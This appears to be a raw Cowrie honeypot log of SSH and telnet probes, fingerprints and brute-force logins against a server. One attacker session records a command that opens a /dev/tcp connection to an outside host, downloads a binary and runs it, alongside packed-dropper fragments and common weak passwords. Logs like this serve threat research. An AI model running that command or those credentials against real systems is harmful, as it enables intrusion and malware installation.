{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54286,"dst_ip":"1.2.3.4","dst_port":23,"session":"c13aebf5d23f","protocol":"telnet","message":"New connection: 212.227.235.229:54286 (1.2.3.4:23) [session: c13aebf5d23f]","sensor":"my-vps","timestamp":"2025-09-08T16:42:47.054957Z"}
{"eventid":"cowrie.session.closed","duration":13.925548791885376,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:43:00.980437Z","src_ip":"212.227.235.229","session":"c13aebf5d23f"}
{"eventid":"cowrie.session.connect","src_ip":"101.201.32.249","src_port":56836,"dst_ip":"1.2.3.4","dst_port":22,"session":"533947f5fea9","protocol":"ssh","message":"New connection: 101.201.32.249:56836 (1.2.3.4:22) [session: 533947f5fea9]","sensor":"my-vps","timestamp":"2025-09-08T16:44:41.650613Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T16:44:41.669665Z","src_ip":"101.201.32.249","session":"533947f5fea9"}
{"eventid":"cowrie.session.connect","src_ip":"64.226.115.244","src_port":6100,"dst_ip":"1.2.3.4","dst_port":22,"session":"41c202f9fd18","protocol":"ssh","message":"New connection: 64.226.115.244:6100 (1.2.3.4:22) [session: 41c202f9fd18]","sensor":"my-vps","timestamp":"2025-09-08T16:44:41.986373Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-09-08T16:44:42.050192Z","src_ip":"64.226.115.244","session":"41c202f9fd18"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-09-08T16:44:42.149930Z","src_ip":"64.226.115.244","session":"41c202f9fd18"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-09-08T16:44:42.881596Z","src_ip":"64.226.115.244","session":"41c202f9fd18"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:44:42.883122Z","src_ip":"64.226.115.244","session":"41c202f9fd18"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.149.186","src_port":37202,"dst_ip":"1.2.3.4","dst_port":23,"session":"202aca68040a","protocol":"telnet","message":"New connection: 176.65.149.186:37202 (1.2.3.4:23) [session: 202aca68040a]","sensor":"my-vps","timestamp":"2025-09-08T16:44:43.982944Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-09-08T16:44:44.021299Z","src_ip":"176.65.149.186","session":"202aca68040a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T16:44:44.041420Z","src_ip":"176.65.149.186","session":"202aca68040a"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-09-08T16:44:44.042781Z","src_ip":"176.65.149.186","session":"202aca68040a"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-09-08T16:44:44.043741Z","src_ip":"176.65.149.186","session":"202aca68040a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57223,"dst_ip":"1.2.3.4","dst_port":22,"session":"829de4b3b56c","protocol":"ssh","message":"New connection: 212.227.125.160:57223 (1.2.3.4:22) [session: 829de4b3b56c]","sensor":"my-vps","timestamp":"2025-09-08T16:45:12.951728Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:45:12.952839Z","src_ip":"212.227.125.160","session":"829de4b3b56c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57438,"dst_ip":"1.2.3.4","dst_port":22,"session":"6221739176d4","protocol":"ssh","message":"New connection: 212.227.125.160:57438 (1.2.3.4:22) [session: 6221739176d4]","sensor":"my-vps","timestamp":"2025-09-08T16:45:13.061432Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T16:45:13.062763Z","src_ip":"212.227.125.160","session":"6221739176d4"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-08T16:45:13.173036Z","src_ip":"212.227.125.160","session":"6221739176d4"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-08T16:45:13.506243Z","src_ip":"212.227.125.160","session":"6221739176d4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-08T16:45:13.617642Z","session":"6221739176d4"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:46:23.062023Z","src_ip":"212.227.125.160","session":"6221739176d4"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:46:41.670575Z","src_ip":"101.201.32.249","session":"533947f5fea9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:47:44.073453Z","src_ip":"176.65.149.186","session":"202aca68040a"}
{"eventid":"cowrie.session.closed","duration":180.09515595436096,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:47:44.078026Z","src_ip":"176.65.149.186","session":"202aca68040a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":63728,"dst_ip":"1.2.3.4","dst_port":22,"session":"4cea3a299d8c","protocol":"ssh","message":"New connection: 212.227.235.229:63728 (1.2.3.4:22) [session: 4cea3a299d8c]","sensor":"my-vps","timestamp":"2025-09-08T16:48:28.666284Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-ZGrab ZGrab SSH Survey","message":"Remote SSH version: SSH-2.0-ZGrab ZGrab SSH Survey","sensor":"my-vps","timestamp":"2025-09-08T16:48:29.518323Z","src_ip":"212.227.235.229","session":"4cea3a299d8c"}
{"eventid":"cowrie.client.kex","hassh":"dd9bcf093c355da7000132131cb36fd0","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-ripemd160-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,hmac-md5,hmac-sha1,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none,zlib@openssh.com,zlib","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-rsa-cert-v00@openssh.com","ssh-dss-cert-v00@openssh.com","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","arcfour256","arcfour128","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","aes192-cbc","aes256-cbc","arcfour","rijndael-cbc@lysator.liu.se"],"macCS":["hmac-md5-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-ripemd160-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","hmac-md5","hmac-sha1","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-ripemd160","hmac-ripemd160@openssh.com","hmac-sha1-96","hmac-md5-96"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: dd9bcf093c355da7000132131cb36fd0","sensor":"my-vps","timestamp":"2025-09-08T16:48:30.753623Z","src_ip":"212.227.235.229","session":"4cea3a299d8c"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:48:37.340153Z","src_ip":"212.227.235.229","session":"4cea3a299d8c"}
{"eventid":"cowrie.session.connect","src_ip":"8.138.136.155","src_port":51196,"dst_ip":"1.2.3.4","dst_port":22,"session":"d400fb3ce8ff","protocol":"ssh","message":"New connection: 8.138.136.155:51196 (1.2.3.4:22) [session: d400fb3ce8ff]","sensor":"my-vps","timestamp":"2025-09-08T16:49:04.853050Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-makiko","message":"Remote SSH version: SSH-2.0-makiko","sensor":"my-vps","timestamp":"2025-09-08T16:49:04.854276Z","src_ip":"8.138.136.155","session":"d400fb3ce8ff"}
{"eventid":"cowrie.client.kex","hassh":"2f5ebb184f5d02324eed9a822f5259dc","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,aes192-cbc,aes256-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1-etm@openssh.com,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","rsa-sha2-256","rsa-sha2-512","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ssh-rsa"],"encCS":["chacha20-poly1305@openssh.com","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-cbc","aes192-cbc","aes256-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1-etm@openssh.com","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2f5ebb184f5d02324eed9a822f5259dc","sensor":"my-vps","timestamp":"2025-09-08T16:49:04.856391Z","src_ip":"8.138.136.155","session":"d400fb3ce8ff"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-09-08T16:49:05.561452Z","src_ip":"8.138.136.155","session":"d400fb3ce8ff"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-09-08T16:49:06.788951Z","src_ip":"8.138.136.155","session":"d400fb3ce8ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T16:49:07.293172Z","src_ip":"8.138.136.155","session":"d400fb3ce8ff"}
{"eventid":"cowrie.command.input","input":"cat /bin/echo","message":"CMD: cat /bin/echo","sensor":"my-vps","timestamp":"2025-09-08T16:49:07.296201Z","src_ip":"8.138.136.155","session":"d400fb3ce8ff"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":64001,"dst_ip":"1.2.3.4","dst_port":22,"session":"35f9e6d0b9cd","protocol":"ssh","message":"New connection: 212.227.235.229:64001 (1.2.3.4:22) [session: 35f9e6d0b9cd]","sensor":"my-vps","timestamp":"2025-09-08T16:49:10.291424Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:49:10.394075Z","src_ip":"212.227.235.229","session":"35f9e6d0b9cd"}
{"eventid":"cowrie.command.input","input":"nohup bash -c \"exec 6<>/dev/tcp/129.144.180.26/60107 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/SPCRIEaFRg && chmod +x /tmp/SPCRIEaFRg && /tmp/SPCRIEaFRg /bQu8U/ddgSTfvh5WicvVGf5f5kKcNpF8SelhZKlIexT2HkQl3v5Y1A1JFBu5nqVHm/dRe84poqGoibuTdthEo96+29MJCZUefl+lBB33EzuJ9blPP5bBcOV9j0dhtfQxbXR1XZXv4LpJiEqcWrH2w==\" &","message":"CMD: nohup bash -c \"exec 6<>/dev/tcp/129.144.180.26/60107 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/SPCRIEaFRg && chmod +x /tmp/SPCRIEaFRg && /tmp/SPCRIEaFRg /bQu8U/ddgSTfvh5WicvVGf5f5kKcNpF8SelhZKlIexT2HkQl3v5Y1A1JFBu5nqVHm/dRe84poqGoibuTdthEo96+29MJCZUefl+lBB33EzuJ9blPP5bBcOV9j0dhtfQxbXR1XZXv4LpJiEqcWrH2w==\" &","sensor":"my-vps","timestamp":"2025-09-08T16:49:13.534938Z","src_ip":"8.138.136.155","session":"d400fb3ce8ff"}
{"eventid":"cowrie.command.input","input":"head -c 1458464 > /tmp/ViibLvYJ84","message":"CMD: head -c 1458464 > /tmp/ViibLvYJ84","sensor":"my-vps","timestamp":"2025-09-08T16:49:13.539092Z","src_ip":"8.138.136.155","session":"d400fb3ce8ff"}
{"eventid":"cowrie.command.input","input":"cat /bin/echoQtd#UPX!","message":"CMD: cat /bin/echoQtd#UPX!","sensor":"my-vps","timestamp":"2025-09-08T16:49:13.770133Z","src_ip":"8.138.136.155","session":"d400fb3ce8ff"}
{"eventid":"cowrie.command.input","input":">yoA@/;'8ELFP;i2","message":"CMD: >yoA@/;'8ELFP;i2","sensor":"my-vps","timestamp":"2025-09-08T16:49:13.775806Z","src_ip":"8.138.136.155","session":"d400fb3ce8ff"}
{"eventid":"cowrie.command.input","input":"","message":"CMD: ","sensor":"my-vps","timestamp":"2025-09-08T16:49:13.780310Z","src_ip":"8.138.136.155","session":"d400fb3ce8ff"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c47896f7ecfcb496c15337317ff61cf87eb9d3a0e0bd2cb00a2098734f35c0c2","size":1988,"shasum":"c47896f7ecfcb496c15337317ff61cf87eb9d3a0e0bd2cb00a2098734f35c0c2","duplicate":false,"duration":"6.5","message":"Closing TTY Log: var/lib/cowrie/tty/c47896f7ecfcb496c15337317ff61cf87eb9d3a0e0bd2cb00a2098734f35c0c2 after 6.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:49:13.782045Z","src_ip":"8.138.136.155","session":"d400fb3ce8ff"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:49:13.783529Z","src_ip":"8.138.136.155","session":"d400fb3ce8ff"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55628,"dst_ip":"1.2.3.4","dst_port":22,"session":"992e5b4cc518","protocol":"ssh","message":"New connection: 217.72.205.35:55628 (1.2.3.4:22) [session: 992e5b4cc518]","sensor":"my-vps","timestamp":"2025-09-08T16:49:30.421312Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:49:30.422776Z","src_ip":"217.72.205.35","session":"992e5b4cc518"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.149.186","src_port":38352,"dst_ip":"1.2.3.4","dst_port":23,"session":"eec51b919a17","protocol":"telnet","message":"New connection: 176.65.149.186:38352 (1.2.3.4:23) [session: eec51b919a17]","sensor":"my-vps","timestamp":"2025-09-08T16:49:43.182038Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-09-08T16:49:43.234703Z","src_ip":"176.65.149.186","session":"eec51b919a17"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T16:49:43.250311Z","src_ip":"176.65.149.186","session":"eec51b919a17"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-09-08T16:49:43.251576Z","src_ip":"176.65.149.186","session":"eec51b919a17"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-09-08T16:49:43.252481Z","src_ip":"176.65.149.186","session":"eec51b919a17"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45455,"dst_ip":"1.2.3.4","dst_port":23,"session":"70bfbedfd337","protocol":"telnet","message":"New connection: 212.227.125.160:45455 (1.2.3.4:23) [session: 70bfbedfd337]","sensor":"my-vps","timestamp":"2025-09-08T16:50:50.564596Z"}
{"eventid":"cowrie.session.closed","duration":31.389837741851807,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:51:21.954353Z","src_ip":"212.227.125.160","session":"70bfbedfd337"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:52:43.287161Z","src_ip":"176.65.149.186","session":"eec51b919a17"}
{"eventid":"cowrie.session.closed","duration":180.10822939872742,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:52:43.290177Z","src_ip":"176.65.149.186","session":"eec51b919a17"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":65105,"dst_ip":"1.2.3.4","dst_port":22,"session":"e316631ef39c","protocol":"ssh","message":"New connection: 212.227.125.160:65105 (1.2.3.4:22) [session: e316631ef39c]","sensor":"my-vps","timestamp":"2025-09-08T16:54:29.755535Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:54:29.816276Z","src_ip":"212.227.125.160","session":"e316631ef39c"}
{"eventid":"cowrie.session.connect","src_ip":"119.65.243.202","src_port":54521,"dst_ip":"1.2.3.4","dst_port":23,"session":"1ddafbc79ec4","protocol":"telnet","message":"New connection: 119.65.243.202:54521 (1.2.3.4:23) [session: 1ddafbc79ec4]","sensor":"my-vps","timestamp":"2025-09-08T16:55:03.296497Z"}
{"eventid":"cowrie.session.closed","duration":39.43045234680176,"message":"Connection lost after 39 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:55:42.726861Z","src_ip":"119.65.243.202","session":"1ddafbc79ec4"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56242,"dst_ip":"1.2.3.4","dst_port":22,"session":"fe3f8af225da","protocol":"ssh","message":"New connection: 217.72.205.35:56242 (1.2.3.4:22) [session: fe3f8af225da]","sensor":"my-vps","timestamp":"2025-09-08T16:56:01.726396Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:56:01.729217Z","src_ip":"217.72.205.35","session":"fe3f8af225da"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35926,"dst_ip":"1.2.3.4","dst_port":22,"session":"c0d260d6eb07","protocol":"ssh","message":"New connection: 212.227.125.160:35926 (1.2.3.4:22) [session: c0d260d6eb07]","sensor":"my-vps","timestamp":"2025-09-08T16:57:46.619283Z"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:57:49.836117Z","src_ip":"212.227.125.160","session":"c0d260d6eb07"}
{"eventid":"cowrie.session.connect","src_ip":"64.62.156.24","src_port":4372,"dst_ip":"1.2.3.4","dst_port":23,"session":"b3460a19702d","protocol":"telnet","message":"New connection: 64.62.156.24:4372 (1.2.3.4:23) [session: b3460a19702d]","sensor":"my-vps","timestamp":"2025-09-08T16:58:08.265108Z"}
{"eventid":"cowrie.session.closed","duration":1.855539321899414,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:58:10.120561Z","src_ip":"64.62.156.24","session":"b3460a19702d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59960,"dst_ip":"1.2.3.4","dst_port":23,"session":"1f7c876642cc","protocol":"telnet","message":"New connection: 212.227.125.160:59960 (1.2.3.4:23) [session: 1f7c876642cc]","sensor":"my-vps","timestamp":"2025-09-08T16:59:05.076740Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-09-08T16:59:05.166801Z","src_ip":"212.227.125.160","session":"1f7c876642cc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T16:59:05.243384Z","src_ip":"212.227.125.160","session":"1f7c876642cc"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-09-08T16:59:05.245401Z","src_ip":"212.227.125.160","session":"1f7c876642cc"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-09-08T16:59:05.246643Z","src_ip":"212.227.125.160","session":"1f7c876642cc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59161,"dst_ip":"1.2.3.4","dst_port":22,"session":"7149a344cab8","protocol":"ssh","message":"New connection: 212.227.235.229:59161 (1.2.3.4:22) [session: 7149a344cab8]","sensor":"my-vps","timestamp":"2025-09-08T17:00:34.864154Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T17:00:34.865276Z","src_ip":"212.227.235.229","session":"7149a344cab8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59534,"dst_ip":"1.2.3.4","dst_port":22,"session":"4bedc3cdb555","protocol":"ssh","message":"New connection: 212.227.235.229:59534 (1.2.3.4:22) [session: 4bedc3cdb555]","sensor":"my-vps","timestamp":"2025-09-08T17:00:35.020063Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T17:00:35.020922Z","src_ip":"212.227.235.229","session":"4bedc3cdb555"}
